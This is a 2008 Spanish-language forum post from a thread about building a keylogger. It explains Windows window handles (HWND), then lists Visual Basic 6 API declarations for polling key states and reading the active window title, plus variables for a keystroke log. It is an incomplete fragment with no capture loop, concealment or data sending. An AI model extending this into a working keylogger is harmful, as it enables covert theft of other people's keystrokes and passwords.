Ver Mensaje Individual
  #3 (permalink)  
Antiguo 07-05-2008, 19:19:16
*Ghost* *Ghost* is offline
Un Nuevo Amigo

*Ghost* Aun no valorado
Predeterminado Re: Mi Proyecto Creando keylogger

El hwnd es un numero, ahora ¿que función cumple ese numero?, imaginemos que tenemos 3 aplicaciones abiertas Word, Excel, y PowerPoint, y la tenemos abierta al mismo tiempo, cuando damos clic a una de ellas en la pantalla, Windows sabe a que programa se da clic gracias al HWND, cada ventana

posee un numero único al momento de ejecutarse, este numero único entra en un registro de ventanas abiertas en el momento de ejecutarlo, cuando se le da clic a una ventana o cualquier otro mensaje él (Windows) sabe para quien va el mensaje ya que el tiene un registro de las ventanas abiertas, y mediante un algoritmo ejecuta la función encargada de controlar el mensaje.Que quise decir con “OJO ventana no programa”, todo lo que tu ves en Windows es una ventana, en este momento te acabas de sorprender con lo que dije pero es lo correcto, ABSOLUTAMENTE TODO lo que estas viendo es una ventana, desde un botón, un listbox, un combobox, un menú, TODO!, ¿que significa? que si tu tienes 100 botones, cuando tu aplicación arranca se generan 100 HWND únicos para cada componente

Bueno ya xD, es que lo escribi cuando apague mi compu tons le habia dejado como Duda :P , pero bueno gracias por la Info, pero ueno ahi Esta sigo analizando mi codigo fuente y veo mas api necesarias xD

Código:
'Funciones api para las teclas
Private Declare Function GetKeyState Lib "user32" (ByVal nVirtKey As Long) As Integer
'Para capturar el Hwnd de la ventana activa
Private Declare Function GetForegroundWindow Lib "user32" () As Long

Private Declare Function GetAsyncKeyState Lib "user32" (ByVal vKey As Long) As Integer
'Api que obtiene el tamaño del Caption de la ventana
Private Declare Function GetWindowTextLength Lib "user32" Alias "GetWindowTextLengthA" (ByVal hwnd As Long) As Long
'Api que obtiene el Caption de la ventana
Private Declare Function GetWindowText Lib "user32" Alias "GetWindowTextA" (ByVal hwnd As Long, ByVal lpString As String, ByVal cch As Long) As Long

'Variable para almacenar las teclas que se van presionando
Dim StrLog As String
'Para el Apth del archivo log
Dim path As String

'Para ejecutar el archivo log desde el botón VerArchivo
Private Declare Function ShellExecute Lib "shell32.dll" Alias "ShellExecuteA" (ByVal hwnd As Long, ByVal lpOperation As String, ByVal lpFile As String, ByVal lpParameters As String, ByVal lpDirectory As String, ByVal nShowCmd As Long) As Long
Const SW_SHOWNORMAL = 1

Private Const VK_CAPITAL = &H14

'Para el titulo de la ventana activa
Dim strVentanaActiva As String
Ok dejo esto aqui mientras leo unos cuantos conceptos y luegro regresare con mas dudas :P Gracias

Pero s tienen algun tuto :P me pueden ayudar o alguna guia de como seguir se los agradeceria mucho

Última edición por *Ghost* fecha: 07-05-2008 a las 19:34:37.
Responder Con Cita